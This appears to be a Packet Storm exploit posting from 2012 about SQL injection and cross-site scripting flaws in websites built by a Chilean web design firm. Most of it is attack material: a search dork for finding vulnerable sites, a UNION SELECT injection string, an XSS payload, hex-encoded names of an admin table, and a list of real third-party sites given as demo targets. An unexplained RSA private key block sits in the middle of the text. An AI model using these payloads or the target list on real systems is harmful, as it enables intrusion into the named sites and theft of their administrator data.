what you don't know can hurt you

Diseno Internet Cross Site Scripting / SQL Injection

Diseno Internet Cross Site Scripting / SQL Injection
Posted Nov 20, 2012
Authored by Ur0b0r0x

Sites design by Diseno Internet Chile suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 750b8a097e20de72ec54959d977c4662

Diseno Internet Cross Site Scripting / SQL Injection

Change Mirror Download

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat


# Exploit Title: Diseño Internet Chile - SQL Injection / Cross-Site Scripting Vulnerabilities
# Dork: intext:Diseño www.diseñointernet.cl
# Date: 13/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.diseñointernet.cl/
# Vendor Name: Diseño Internet Chile
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[05/11/2012] - Vulnerability discovered
[08/11/2012] - Vendor notified Dont responsed
[13/11/2012] - Public disclosure
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/detalle_noticia.php?&id= < Sql Vulnerability Path >
http://site.com/detalle_noticia.php?&id= < Xss Vulnerability Path >

# Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12,14,15,16,17,18,19,20,21,22,23,24,25,26--
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Payload/Comand/Sql=> table_schema=0x706172726F7175695F61646D696E / table_name=0x74626C5F61646D696E6973747261646F72

# Demo_Xss_Sql_Vulnerabilities
http://www.textileschile.cl/detalle_noticia.php?id=1'
http://parroquiajesusnazareno.info/detalle_noticia.php?id=1'
http://aprajud.cl/detalle_noticia.php?id=1'
http://www.aprajud.cl/detalle_noticia.php?&id=1'

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/
-----END RSA PRIVATE KEY-----
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close